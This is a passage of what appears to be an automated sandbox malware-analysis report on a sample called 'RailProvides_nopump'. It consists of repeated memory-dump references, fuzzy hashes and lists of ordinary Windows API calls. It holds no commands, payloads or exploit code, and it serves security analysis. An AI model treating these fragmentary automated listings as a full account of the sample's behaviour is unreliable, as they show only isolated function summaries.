                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                    • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                                    • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                    • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                    • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                                    • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                    • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                                    APIs
                                                                    • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                    • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                    • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                    • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: Global$AllocFree
                                                                    • String ID:
                                                                    • API String ID: 3394109436-0
                                                                    • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                    • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                                    • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                    • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                                    APIs
                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                    • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                                    • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                    • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: File$AttributesCreate
                                                                    • String ID:
                                                                    • API String ID: 415043291-0
                                                                    • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                    • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                                    • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                    • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                    • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                                    • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                    • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                                    APIs
                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                    • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                                    • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                    • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                                    APIs
                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                      • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                    • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: Char$Next$CreateDirectoryPrev
                                                                    • String ID:
                                                                    • API String ID: 4115351271-0
                                                                    • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                    • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                                    • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                    • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                                    APIs
                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                    • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                                                    • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                    • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: FilePointer
                                                                    • String ID:
                                                                    • API String ID: 973152223-0
                                                                    • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                    • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                                    • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                    • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                                    APIs
                                                                    • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                    • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                                                    • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                    • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                                                    APIs
                                                                    • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: CallbackDispatcherUser
                                                                    • String ID:
                                                                    • API String ID: 2492992576-0
                                                                    • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                    • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                                    • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                    • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                    • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                    • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                    • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                    • DeleteObject.GDI32(?), ref: 00404A79
                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                    • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                    • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                    • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                    • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                    • String ID: $ @$M$N
                                                                    • API String ID: 1638840714-3479655940
                                                                    • Opcode ID: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
